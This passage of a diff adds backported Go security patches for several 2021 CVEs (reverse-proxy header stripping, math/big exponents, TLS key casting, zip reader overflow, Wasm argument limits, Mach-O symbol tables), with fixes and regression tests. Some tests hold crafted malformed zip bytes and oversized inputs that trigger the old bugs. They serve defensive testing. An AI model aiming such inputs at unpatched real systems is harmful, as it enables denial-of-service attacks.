++ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2d,
++ 0x00, 0x2d, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
++ 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
++ 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0xff,
++ 0xff, 0xff, 0xff, 0x31, 0x00, 0x00, 0x00, 0x00,
++ 0x00, 0x00, 0x00, 0x3a, 0x00, 0x00, 0x00, 0x00,
++ 0x00, 0x00, 0x00, 0x50, 0x4b, 0x06, 0x07, 0x00,
++ 0x00, 0x00, 0x00, 0x6b, 0x00, 0x00, 0x00, 0x00,
++ 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x50,
++ 0x4b, 0x05, 0x06, 0x00, 0x00, 0x00, 0x00, 0xff,
++ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
++ 0xff, 0xff, 0xff, 0x00, 0x00,
++ }
++ _, err := NewReader(bytes.NewReader(data), int64(len(data)))
++ if err != ErrFormat {
++ t.Fatalf("unexpected error, got: %v, want: %v", err, ErrFormat)
++ }
++
++ // Also check that an archive containing a handful of empty
++ // files doesn't cause an issue
++ b := bytes.NewBuffer(nil)
++ w := NewWriter(b)
++ for i := 0; i < 5; i++ {
++ _, err := w.Create("")
++ if err != nil {
++ t.Fatalf("Writer.Create failed: %s", err)
++ }
++ }
++ if err := w.Close(); err != nil {
++ t.Fatalf("Writer.Close failed: %s", err)
++ }
++ r, err := NewReader(bytes.NewReader(b.Bytes()), int64(b.Len()))
++ if err != nil {
++ t.Fatalf("NewReader failed: %s", err)
++ }
++ if len(r.File) != 5 {
++ t.Errorf("Archive has unexpected number of files, got %d, want 5", len(r.File))
++ }
++}
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-33197.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-33197.patch
new file mode 100644
index 0000000000..2052b1d3db
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-33197.patch
@@ -0,0 +1,152 @@
+From cbd1ca84453fecf3825a6bb9f985823e8bc32b76 Mon Sep 17 00:00:00 2001
+From: Filippo Valsorda <filippo@golang.org>
+Date: Fri, 21 May 2021 14:02:30 -0400
+Subject: [PATCH] [release-branch.go1.15] net/http/httputil: always remove
+ hop-by-hop headers
+
+Previously, we'd fail to remove the Connection header from a request
+like this:
+
+ Connection:
+ Connection: x-header
+
+Updates #46313
+Fixes #46314
+Fixes CVE-2021-33197
+
+Change-Id: Ie3009e926ceecfa86dfa6bcc6fe14ff01086be7d
+Reviewed-on: https://go-review.googlesource.com/c/go/+/321929
+Run-TryBot: Filippo Valsorda <filippo@golang.org>
+Reviewed-by: Katie Hockman <katie@golang.org>
+Trust: Katie Hockman <katie@golang.org>
+Trust: Filippo Valsorda <filippo@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/323091
+Run-TryBot: Katie Hockman <katie@golang.org>
+
+Upstream-Status: Backport
+CVE: CVE-2021-33197
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ src/net/http/httputil/reverseproxy.go | 22 ++++----
+ src/net/http/httputil/reverseproxy_test.go | 63 +++++++++++++++++++++-
+ 2 files changed, 70 insertions(+), 15 deletions(-)
+
+Index: go/src/net/http/httputil/reverseproxy.go
+===================================================================
+--- go.orig/src/net/http/httputil/reverseproxy.go
++++ go/src/net/http/httputil/reverseproxy.go
+@@ -221,22 +221,18 @@ func (p *ReverseProxy) ServeHTTP(rw http
+ // important is "Connection" because we want a persistent
+ // connection, regardless of what the client sent to us.
+ for _, h := range hopHeaders {
+- hv := outreq.Header.Get(h)
+- if hv == "" {
+- continue
+- }
+- if h == "Te" && hv == "trailers" {
+- // Issue 21096: tell backend applications that
+- // care about trailer support that we support
+- // trailers. (We do, but we don't go out of
+- // our way to advertise that unless the
+- // incoming client request thought it was
+- // worth mentioning)
+- continue
+- }
+ outreq.Header.Del(h)
+ }
+
++ // Issue 21096: tell backend applications that care about trailer support
++ // that we support trailers. (We do, but we don't go out of our way to
++ // advertise that unless the incoming client request thought it was worth
++ // mentioning.) Note that we look at req.Header, not outreq.Header, since
++ // the latter has passed through removeConnectionHeaders.
++ if httpguts.HeaderValuesContainsToken(req.Header["Te"], "trailers") {
++ outreq.Header.Set("Te", "trailers")
++ }
++
+ // After stripping all the hop-by-hop connection headers above, add back any
+ // necessary for protocol upgrades, such as for websockets.
+ if reqUpType != "" {
+Index: go/src/net/http/httputil/reverseproxy_test.go
+===================================================================
+--- go.orig/src/net/http/httputil/reverseproxy_test.go
++++ go/src/net/http/httputil/reverseproxy_test.go
+@@ -91,8 +91,9 @@ func TestReverseProxy(t *testing.T) {
+
+ getReq, _ := http.NewRequest("GET", frontend.URL, nil)
+ getReq.Host = "some-name"
+- getReq.Header.Set("Connection", "close")
+- getReq.Header.Set("Te", "trailers")
++ getReq.Header.Set("Connection", "close, TE")
++ getReq.Header.Add("Te", "foo")
++ getReq.Header.Add("Te", "bar, trailers")
+ getReq.Header.Set("Proxy-Connection", "should be deleted")
+ getReq.Header.Set("Upgrade", "foo")
+ getReq.Close = true
+@@ -236,6 +237,64 @@ func TestReverseProxyStripHeadersPresent
+ }
+ }
+
++func TestReverseProxyStripEmptyConnection(t *testing.T) {
++ // See Issue 46313.
++ const backendResponse = "I am the backend"
++
++ // someConnHeader is some arbitrary header to be declared as a hop-by-hop header
++ // in the Request's Connection header.
++ const someConnHeader = "X-Some-Conn-Header"
++
++ backend := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
++ if c := r.Header.Values("Connection"); len(c) != 0 {
++ t.Errorf("handler got header %q = %v; want empty", "Connection", c)
++ }
++ if c := r.Header.Get(someConnHeader); c != "" {
++ t.Errorf("handler got header %q = %q; want empty", someConnHeader, c)
++ }
++ w.Header().Add("Connection", "")
++ w.Header().Add("Connection", someConnHeader)
++ w.Header().Set(someConnHeader, "should be deleted")
++ io.WriteString(w, backendResponse)
++ }))
++ defer backend.Close()
++ backendURL, err := url.Parse(backend.URL)
++ if err != nil {
++ t.Fatal(err)
++ }
++ proxyHandler := NewSingleHostReverseProxy(backendURL)
++ frontend := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
++ proxyHandler.ServeHTTP(w, r)
++ if c := r.Header.Get(someConnHeader); c != "should be deleted" {
++ t.Errorf("handler modified header %q = %q; want %q", someConnHeader, c, "should be deleted")
++ }
++ }))
++ defer frontend.Close()
++
++ getReq, _ := http.NewRequest("GET", frontend.URL, nil)
++ getReq.Header.Add("Connection", "")
++ getReq.Header.Add("Connection", someConnHeader)
++ getReq.Header.Set(someConnHeader, "should be deleted")
++ res, err := frontend.Client().Do(getReq)
++ if err != nil {
++ t.Fatalf("Get: %v", err)
++ }
++ defer res.Body.Close()
++ bodyBytes, err := ioutil.ReadAll(res.Body)
++ if err != nil {
++ t.Fatalf("reading body: %v", err)
++ }
++ if got, want := string(bodyBytes), backendResponse; got != want {
++ t.Errorf("got body %q; want %q", got, want)
++ }
++ if c := res.Header.Get("Connection"); c != "" {
++ t.Errorf("handler got header %q = %q; want empty", "Connection", c)
++ }
++ if c := res.Header.Get(someConnHeader); c != "" {
++ t.Errorf("handler got header %q = %q; want empty", someConnHeader, c)
++ }
++}
++
+ func TestXForwardedFor(t *testing.T) {
+ const prevForwardedFor = "client ip"
+ const backendResponse = "I am the backend"
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-33198.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-33198.patch
new file mode 100644
index 0000000000..241c08dad7
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-33198.patch
@@ -0,0 +1,113 @@
+From c8866491ac424cdf39aedb325e6dec9e54418cfb Mon Sep 17 00:00:00 2001
+From: Robert Griesemer <gri@golang.org>
+Date: Sun, 2 May 2021 11:27:03 -0700
+Subject: [PATCH] math/big: check for excessive exponents in Rat.SetString
+
+CVE-2021-33198
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/df9ce19db6df32d94eae8760927bdfbc595433c3]
+CVE: CVE-2021-33198
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+
+
+Found by OSS-Fuzz https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=33284
+
+Thanks to Emmanuel Odeke for reporting this issue.
+
+Updates #45910
+Fixes #46305
+Fixes CVE-2021-33198
+
+Change-Id: I61e7b04dbd80343420b57eede439e361c0f7b79c
+Reviewed-on: https://go-review.googlesource.com/c/go/+/316149
+Trust: Robert Griesemer <gri@golang.org>
+Trust: Katie Hockman <katie@golang.org>
+Run-TryBot: Robert Griesemer <gri@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Katie Hockman <katie@golang.org>
+Reviewed-by: Emmanuel Odeke <emmanuel@orijtech.com>
+(cherry picked from commit 6c591f79b0b5327549bd4e94970f7a279efb4ab0)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/321831
+Run-TryBot: Katie Hockman <katie@golang.org>
+Reviewed-by: Roland Shoemaker <roland@golang.org>
+---
+ src/math/big/ratconv.go | 15 ++++++++-------
+ src/math/big/ratconv_test.go | 25 +++++++++++++++++++++++++
+ 2 files changed, 33 insertions(+), 7 deletions(-)
+
+diff --git a/src/math/big/ratconv.go b/src/math/big/ratconv.go
+index e8cbdbe..90053a9 100644
+--- a/src/math/big/ratconv.go
++++ b/src/math/big/ratconv.go
+@@ -51,7 +51,8 @@ func (z *Rat) Scan(s fmt.ScanState, ch rune) error {
+ // An optional base-10 ``e'' or base-2 ``p'' (or their upper-case variants)
+ // exponent may be provided as well, except for hexadecimal floats which
+ // only accept an (optional) ``p'' exponent (because an ``e'' or ``E'' cannot
+-// be distinguished from a mantissa digit).
++// be distinguished from a mantissa digit). If the exponent's absolute value
++// is too large, the operation may fail.
+ // The entire string, not just a prefix, must be valid for success. If the
+ // operation failed, the value of z is undefined but the returned value is nil.
+ func (z *Rat) SetString(s string) (*Rat, bool) {
+@@ -174,6 +175,9 @@ func (z *Rat) SetString(s string) (*Rat, bool) {
+ return nil, false
+ }
+ }
++ if n > 1e6 {
++ return nil, false // avoid excessively large exponents
++ }
+ pow5 := z.b.abs.expNN(natFive, nat(nil).setWord(Word(n)), nil) // use underlying array of z.b.abs
+ if exp5 > 0 {
+ z.a.abs = z.a.abs.mul(z.a.abs, pow5)
+@@ -186,15 +190,12 @@ func (z *Rat) SetString(s string) (*Rat, bool) {
+ }
+
+ // apply exp2 contributions
++ if exp2 < -1e7 || exp2 > 1e7 {
++ return nil, false // avoid excessively large exponents
++ }
+ if exp2 > 0 {
+- if int64(uint(exp2)) != exp2 {
+- panic("exponent too large")
+- }
+ z.a.abs = z.a.abs.shl(z.a.abs, uint(exp2))
+ } else if exp2 < 0 {
+- if int64(uint(-exp2)) != -exp2 {
+- panic("exponent too large")
+- }
+ z.b.abs = z.b.abs.shl(z.b.abs, uint(-exp2))
+ }
+
+diff --git a/src/math/big/ratconv_test.go b/src/math/big/ratconv_test.go
+index b820df4..e55e655 100644
+--- a/src/math/big/ratconv_test.go
++++ b/src/math/big/ratconv_test.go
+@@ -590,3 +590,28 @@ func TestIssue31184(t *testing.T) {
+ }
+ }
+ }
++
++func TestIssue45910(t *testing.T) {
++ var x Rat
++ for _, test := range []struct {
++ input string
++ want bool
++ }{
++ {"1e-1000001", false},
++ {"1e-1000000", true},
++ {"1e+1000000", true},
++ {"1e+1000001", false},
++
++ {"0p1000000000000", true},
++ {"1p-10000001", false},
++ {"1p-10000000", true},
++ {"1p+10000000", true},
++ {"1p+10000001", false},
++ {"1.770p02041010010011001001", false}, // test case from issue
++ } {
++ _, got := x.SetString(test.input)
++ if got != test.want {
++ t.Errorf("SetString(%s) got ok = %v; want %v", test.input, got, test.want)
++ }
++ }
++}
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-34558.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-34558.patch
new file mode 100644
index 0000000000..8fb346d622
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-34558.patch
@@ -0,0 +1,51 @@
+From a98589711da5e9d935e8d690cfca92892e86d557 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <roland@golang.org>
+Date: Wed, 9 Jun 2021 11:31:27 -0700
+Subject: [PATCH] crypto/tls: test key type when casting
+
+When casting the certificate public key in generateClientKeyExchange,
+check the type is appropriate. This prevents a panic when a server
+agrees to a RSA based key exchange, but then sends an ECDSA (or
+other) certificate.
+
+Fixes #47143
+Fixes CVE-2021-34558
+
+Thanks to Imre Rad for reporting this issue.
+
+Change-Id: Iabccacca6052769a605cccefa1216a9f7b7f6aea
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1116723
+Reviewed-by: Filippo Valsorda <valsorda@google.com>
+Reviewed-by: Katie Hockman <katiehockman@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/334031
+Trust: Filippo Valsorda <filippo@golang.org>
+Run-TryBot: Filippo Valsorda <filippo@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
+
+Upstream-Status: Backport
+https://github.com/golang/go/commit/a98589711da5e9d935e8d690cfca92892e86d557
+CVE: CVE-2021-34558
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ src/crypto/tls/key_agreement.go | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+Index: go/src/crypto/tls/key_agreement.go
+===================================================================
+--- go.orig/src/crypto/tls/key_agreement.go
++++ go/src/crypto/tls/key_agreement.go
+@@ -67,7 +67,11 @@ func (ka rsaKeyAgreement) generateClient
+ return nil, nil, err
+ }
+
+- encrypted, err := rsa.EncryptPKCS1v15(config.rand(), cert.PublicKey.(*rsa.PublicKey), preMasterSecret)
++ rsaKey, ok := cert.PublicKey.(*rsa.PublicKey)
++ if !ok {
++ return nil, nil, errors.New("tls: server certificate contains incorrect key type for selected ciphersuite")
++ }
++ encrypted, err := rsa.EncryptPKCS1v15(config.rand(), rsaKey, preMasterSecret)
+ if err != nil {
+ return nil, nil, err
+ }
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-36221.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-36221.patch
new file mode 100644
index 0000000000..9c00d4ebb2
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-36221.patch
@@ -0,0 +1,101 @@
+From b7a85e0003cedb1b48a1fd3ae5b746ec6330102e Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Wed, 7 Jul 2021 16:34:34 -0700
+Subject: [PATCH] net/http/httputil: close incoming ReverseProxy request body
+
+Reading from an incoming request body after the request handler aborts
+with a panic can cause a panic, becuse http.Server does not (contrary
+to its documentation) close the request body in this case.
+
+Always close the incoming request body in ReverseProxy.ServeHTTP to
+ensure that any in-flight outgoing requests using the body do not
+read from it.
+
+Updates #46866
+Fixes CVE-2021-36221
+
+Change-Id: I310df269200ad8732c5d9f1a2b00de68725831df
+Reviewed-on: https://go-review.googlesource.com/c/go/+/333191
+Trust: Damien Neil <dneil@google.com>
+Reviewed-by: Brad Fitzpatrick <bradfitz@golang.org>
+Reviewed-by: Filippo Valsorda <filippo@golang.org>
+
+https://github.com/golang/go/commit/b7a85e0003cedb1b48a1fd3ae5b746ec6330102e
+CVE: CVE-2021-36221
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ src/net/http/httputil/reverseproxy.go | 9 +++++
+ src/net/http/httputil/reverseproxy_test.go | 39 ++++++++++++++++++++++
+ 2 files changed, 48 insertions(+)
+
+diff --git a/src/net/http/httputil/reverseproxy.go b/src/net/http/httputil/reverseproxy.go
+index 5d39955d62d15..8b63368386f43 100644
+--- a/src/net/http/httputil/reverseproxy.go
++++ b/src/net/http/httputil/reverseproxy.go
+@@ -235,6 +235,15 @@ func (p *ReverseProxy) ServeHTTP(rw http.ResponseWriter, req *http.Request) {
+ if req.ContentLength == 0 {
+ outreq.Body = nil // Issue 16036: nil Body for http.Transport retries
+ }
++ if outreq.Body != nil {
++ // Reading from the request body after returning from a handler is not
++ // allowed, and the RoundTrip goroutine that reads the Body can outlive
++ // this handler. This can lead to a crash if the handler panics (see
++ // Issue 46866). Although calling Close doesn't guarantee there isn't
++ // any Read in flight after the handle returns, in practice it's safe to
++ // read after closing it.
++ defer outreq.Body.Close()
++ }
+ if outreq.Header == nil {
+ outreq.Header = make(http.Header) // Issue 33142: historical behavior was to always allocate
+ }
+diff --git a/src/net/http/httputil/reverseproxy_test.go b/src/net/http/httputil/reverseproxy_test.go
+index 1898ed8b8afde..4b6ad77a29466 100644
+--- a/src/net/http/httputil/reverseproxy_test.go
++++ b/src/net/http/httputil/reverseproxy_test.go
+@@ -1122,6 +1122,45 @@ func TestReverseProxy_PanicBodyError(t *testing.T) {
+ rproxy.ServeHTTP(httptest.NewRecorder(), req)
+ }
+
++// Issue #46866: panic without closing incoming request body causes a panic
++func TestReverseProxy_PanicClosesIncomingBody(t *testing.T) {
++ backend := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
++ out := "this call was relayed by the reverse proxy"
++ // Coerce a wrong content length to induce io.ErrUnexpectedEOF
++ w.Header().Set("Content-Length", fmt.Sprintf("%d", len(out)*2))
++ fmt.Fprintln(w, out)
++ }))
++ defer backend.Close()
++ backendURL, err := url.Parse(backend.URL)
++ if err != nil {
++ t.Fatal(err)
++ }
++ proxyHandler := NewSingleHostReverseProxy(backendURL)
++ proxyHandler.ErrorLog = log.New(io.Discard, "", 0) // quiet for tests
++ frontend := httptest.NewServer(proxyHandler)
++ defer frontend.Close()
++ frontendClient := frontend.Client()
++
++ var wg sync.WaitGroup
++ for i := 0; i < 2; i++ {
++ wg.Add(1)
++ go func() {
++ defer wg.Done()
++ for j := 0; j < 10; j++ {
++ const reqLen = 6 * 1024 * 1024
++ req, _ := http.NewRequest("POST", frontend.URL, &io.LimitedReader{R: neverEnding('x'), N: reqLen})
++ req.ContentLength = reqLen
++ resp, _ := frontendClient.Transport.RoundTrip(req)
++ if resp != nil {
++ io.Copy(io.Discard, resp.Body)
++ resp.Body.Close()
++ }
++ }
++ }()
++ }
++ wg.Wait()
++}
++
+ func TestSelectFlushInterval(t *testing.T) {
+ tests := []struct {
+ name string
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-38297.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-38297.patch
new file mode 100644
index 0000000000..24ceabf808
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-38297.patch
@@ -0,0 +1,97 @@
+From 4548fcc8dfd933c237f29bba6f90040a85922564 Mon Sep 17 00:00:00 2001
+From: Michael Knyszek <mknyszek@google.com>
+Date: Thu, 2 Sep 2021 16:51:59 -0400
+Subject: [PATCH] [release-branch.go1.16] misc/wasm, cmd/link: do not let
+ command line args overwrite global data
+
+On Wasm, wasm_exec.js puts command line arguments at the beginning
+of the linear memory (following the "zero page"). Currently there
+is no limit for this, and a very long command line can overwrite
+the program's data section. Prevent this by limiting the command
+line to 4096 bytes, and in the linker ensuring the data section
+starts at a high enough address (8192).
+
+(Arguably our address assignment on Wasm is a bit confusing. This
+is the minimum fix I can come up with.)
+
+Thanks to Ben Lubar for reporting this issue.
+
+Change by Cherry Mui <cherryyz@google.com>.
+
+For #48797
+Fixes #48799
+Fixes CVE-2021-38297
+
+Change-Id: I0f50fbb2a5b6d0d047e3c134a88988d9133e4ab3
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1205933
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Than McIntosh <thanm@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/354591
+Trust: Michael Knyszek <mknyszek@google.com>
+Reviewed-by: Heschi Kreinick <heschi@google.com>
+
+CVE: CVE-2021-38297
+
+Upstream-Status: Backport:
+https://github.com/golang/go/commit/4548fcc8dfd933c237f29bba6f90040a85922564
+
+Inline of ctxt.isWAsm followin this implemetation:
+https://github.com/golang/go/blob/4548fcc8dfd933c237f29bba6f90040a85922564/src/cmd/link/internal/ld/target.go#L127
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ misc/wasm/wasm_exec.js | 7 +++++++
+ src/cmd/link/internal/ld/data.go | 11 ++++++++++-
+ 2 files changed, 17 insertions(+), 1 deletion(-)
+
+diff --git a/misc/wasm/wasm_exec.js b/misc/wasm/wasm_exec.js
+index 82041e6bb901..a0a264278b1b 100644
+--- a/misc/wasm/wasm_exec.js
++++ b/misc/wasm/wasm_exec.js
+@@ -564,6 +564,13 @@
+ offset += 8;
+ });
+
++ // The linker guarantees global data starts from at least wasmMinDataAddr.
++ // Keep in sync with cmd/link/internal/ld/data.go:wasmMinDataAddr.
++ const wasmMinDataAddr = 4096 + 4096;
++ if (offset >= wasmMinDataAddr) {
++ throw new Error("command line too long");
++ }
++
+ this._inst.exports.run(argc, argv);
+ if (this.exited) {
+ this._resolveExitPromise();
+diff --git a/src/cmd/link/internal/ld/data.go b/src/cmd/link/internal/ld/data.go
+index 52035e96301c..54a1d188cdb9 100644
+--- a/src/cmd/link/internal/ld/data.go
++++ b/src/cmd/link/internal/ld/data.go
+@@ -2330,6 +2330,11 @@ func assignAddress(ctxt *Link, sect *sym.Section, n int, s loader.Sym, va uint64
+ return sect, n, va
+ }
+
++// On Wasm, we reserve 4096 bytes for zero page, then 4096 bytes for wasm_exec.js
++// to store command line args. Data sections starts from at least address 8192.
++// Keep in sync with wasm_exec.js.
++const wasmMinDataAddr = 4096 + 4096
++
+ // address assigns virtual addresses to all segments and sections and
+ // returns all segments in file order.
+ func (ctxt *Link) address() []*sym.Segment {
+@@ -2339,10 +2344,14 @@ func (ctxt *Link) address() []*sym.Segment {
+ order = append(order, &Segtext)
+ Segtext.Rwx = 05
+ Segtext.Vaddr = va
+- for _, s := range Segtext.Sections {
++ for i, s := range Segtext.Sections {
+ va = uint64(Rnd(int64(va), int64(s.Align)))
+ s.Vaddr = va
+ va += s.Length
++
++ if ctxt.Arch.Family == sys.Wasm && i == 0 && va < wasmMinDataAddr {
++ va = wasmMinDataAddr
++ }
+ }
+
+ Segtext.Length = va - uint64(*FlagTextAddr)
+ \ No newline at end of file
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-39293.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-39293.patch
new file mode 100644
index 0000000000..88fca9cad9
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-39293.patch
@@ -0,0 +1,79 @@
+From 6c480017ae600b2c90a264a922e041df04dfa785 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <roland@golang.org>
+Date: Wed, 18 Aug 2021 11:49:29 -0700
+Subject: [PATCH] [release-branch.go1.16] archive/zip: prevent preallocation
+ check from overflowing
+
+If the indicated directory size in the archive header is so large that
+subtracting it from the archive size overflows a uint64, the check that
+the indicated number of files in the archive can be effectively
+bypassed. Prevent this from happening by checking that the indicated
+directory size is less than the size of the archive.
+
+Thanks to the OSS-Fuzz project for discovering this issue and to
+Emmanuel Odeke for reporting it.
+
+Fixes #47985
+Updates #47801
+Fixes CVE-2021-39293
+
+Change-Id: Ifade26b98a40f3b37398ca86bd5252d12394dd24
+Reviewed-on: https://go-review.googlesource.com/c/go/+/343434
+Trust: Roland Shoemaker <roland@golang.org>
+Run-TryBot: Roland Shoemaker <roland@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Russ Cox <rsc@golang.org>
+(cherry picked from commit bacbc33439b124ffd7392c91a5f5d96eca8c0c0b)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/345409
+Reviewed-by: Emmanuel Odeke <emmanuel@orijtech.com>
+Run-TryBot: Emmanuel Odeke <emmanuel@orijtech.com>
+Trust: Cherry Mui <cherryyz@google.com>
+
+https://github.com/golang/go/commit/6c480017ae600b2c90a264a922e041df04dfa785
+CVE: CVE-2021-39293
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ src/archive/zip/reader.go | 2 +-
+ src/archive/zip/reader_test.go | 18 ++++++++++++++++++
+ 2 files changed, 19 insertions(+), 1 deletion(-)
+
+diff --git a/src/archive/zip/reader.go b/src/archive/zip/reader.go
+index ddef2b7b5a517..801d1313b6c32 100644
+--- a/src/archive/zip/reader.go
++++ b/src/archive/zip/reader.go
+@@ -105,7 +105,7 @@ func (z *Reader) init(r io.ReaderAt, size int64) error {
+ // indicate it contains up to 1 << 128 - 1 files. Since each file has a
+ // header which will be _at least_ 30 bytes we can safely preallocate
+ // if (data size / 30) >= end.directoryRecords.
+- if (uint64(size)-end.directorySize)/30 >= end.directoryRecords {
++ if end.directorySize < uint64(size) && (uint64(size)-end.directorySize)/30 >= end.directoryRecords {
+ z.File = make([]*File, 0, end.directoryRecords)
+ }
+ z.Comment = end.comment
+diff --git a/src/archive/zip/reader_test.go b/src/archive/zip/reader_test.go
+index 471be27bb1004..99f13345d8d06 100644
+--- a/src/archive/zip/reader_test.go
++++ b/src/archive/zip/reader_test.go
+@@ -1225,3 +1225,21 @@ func TestCVE202133196(t *testing.T) {
+ t.Errorf("Archive has unexpected number of files, got %d, want 5", len(r.File))
+ }
+ }
++
++func TestCVE202139293(t *testing.T) {
++ // directory size is so large, that the check in Reader.init
++ // overflows when subtracting from the archive size, causing
++ // the pre-allocation check to be bypassed.
++ data := []byte{
++ 0x50, 0x4b, 0x06, 0x06, 0x05, 0x06, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x50, 0x4b,
++ 0x06, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
++ 0x00, 0x00, 0x50, 0x4b, 0x05, 0x06, 0x00, 0x1a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x50, 0x4b,
++ 0x06, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
++ 0x00, 0x00, 0x00, 0x50, 0x4b, 0x05, 0x06, 0x00, 0x31, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff,
++ 0xff, 0x50, 0xfe, 0x00, 0xff, 0x00, 0x3a, 0x00, 0x00, 0x00, 0xff,
++ }
++ _, err := NewReader(bytes.NewReader(data), int64(len(data)))
++ if err != ErrFormat {
++ t.Fatalf("unexpected error, got: %v, want: %v", err, ErrFormat)
++ }
++}
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-41771.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-41771.patch
new file mode 100644
index 0000000000..526796dbcb
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-41771.patch
@@ -0,0 +1,86 @@
+From d19c5bdb24e093a2d5097b7623284eb02726cede Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <roland@golang.org>
+Date: Thu, 14 Oct 2021 13:02:01 -0700
+Subject: [PATCH] [release-branch.go1.16] debug/macho: fail on invalid dynamic
+ symbol table command
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Fail out when loading a file that contains a dynamic symbol table
+command that indicates a larger number of symbols than exist in the
+loaded symbol table.
+
+Thanks to Burak Çarıkçı - Yunus Yıldırım (CT-Zer0 Crypttech) for
+reporting this issue.
+
+Updates #48990
+Fixes #48991
+Fixes CVE-2021-41771
+
+Change-Id: Ic3d6e6529241afcc959544b326b21b663262bad5
+Reviewed-on: https://go-review.googlesource.com/c/go/+/355990
+Reviewed-by: Julie Qiu <julie@golang.org>
+Reviewed-by: Katie Hockman <katie@golang.org>
+Reviewed-by: Emmanuel Odeke <emmanuel@orijtech.com>
+Run-TryBot: Roland Shoemaker <roland@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Trust: Katie Hockman <katie@golang.org>
+(cherry picked from commit 61536ec03063b4951163bd09609c86d82631fa27)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/359454
+Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
+
+https://github.com/golang/go/commit/d19c5bdb24e093a2d5097b7623284eb02726cede
+CVE: CVE-2021-41771
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ src/debug/macho/file.go | 9 +++++++++
+ src/debug/macho/file_test.go | 7 +++++++
+ .../testdata/gcc-amd64-darwin-exec-with-bad-dysym.base64 | 1 +
+ 3 files changed, 17 insertions(+)
+ create mode 100644 src/debug/macho/testdata/gcc-amd64-darwin-exec-with-bad-dysym.base64
+
+diff --git a/src/debug/macho/file.go b/src/debug/macho/file.go
+index 085b0c8219bad..73cfce3c7606e 100644
+--- a/src/debug/macho/file.go
++++ b/src/debug/macho/file.go
+@@ -345,6 +345,15 @@ func NewFile(r io.ReaderAt) (*File, error) {
+ if err := binary.Read(b, bo, &hdr); err != nil {
+ return nil, err
+ }
++ if hdr.Iundefsym > uint32(len(f.Symtab.Syms)) {
++ return nil, &FormatError{offset, fmt.Sprintf(
++ "undefined symbols index in dynamic symbol table command is greater than symbol table length (%d > %d)",
++ hdr.Iundefsym, len(f.Symtab.Syms)), nil}
++ } else if hdr.Iundefsym+hdr.Nundefsym > uint32(len(f.Symtab.Syms)) {
